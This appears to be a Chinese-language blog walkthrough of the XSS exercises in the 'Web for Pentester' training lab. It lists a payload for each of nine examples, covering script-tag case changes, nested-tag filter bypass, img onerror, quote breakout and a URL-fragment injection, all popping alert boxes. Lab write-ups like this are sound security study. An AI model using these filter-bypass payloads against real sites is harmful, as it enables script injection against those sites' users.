web for pentester xss
阿新 • • 發佈:2020-09-13
日期:2020-09-12
XSS
- example1
DOM 型XSS 直接注入
/xss/example1.php?name=<script>alert("xxx")</script>
- example2
DOM 型XSS 直接注入 沒反應說明有過濾 首字母大寫試試注入成功
/xss/example2.php?name=<Script>alert("xxx")</Script>
- example3
DOM 型XSS 直接注入 沒反應說明有過濾 首字母大寫發現沒效果 過濾掉了script標籤 所以繞過一下使得過濾一次之後一樣可以注入
/xss/example3.php?name=<scr<script>ipt>alert(111)</SC</script>RIPT>
- example4
輸入之前的poc發現直接返回error 應該是判斷了script標籤 所以只有跟換其他標籤觸發,例如img標籤的onerror函式
/xss/example3.php?name=<img%20src=""%20%20onerror=alert("111")>
- example5
輸入alert直接報錯,可以使用其他的彈出框window.confirm("sometext");window.prompt("sometext","defaultText");
/xss/example5.php?name=<script>window.confirm("xss")</script>
- example6
通過f12 發現變數被複制給了a,所以可以直接閉合截斷
/xss/example6.php?name=";alert(111);"
- example7
通過f12 發現變數被複制給了a,所以可以直接閉合截斷 與上面一題有區別的是這次是單引號閉合
/xss/example7.php?name=hacker%27;%20alert(111);%27
- example8
通過看F12 可以看到action中的連線就是url,所以可以嘗試form表單截斷
/xss/example8.php/"><script>alert("xss")</script>
- example9
預設url 是顯示#hacker 所以是#後面的內容是注入點 但是這個只有在ie上才有效,當然也有可能有別的解題思路
/xss/example9.php#<\script>alert(1)<\/script>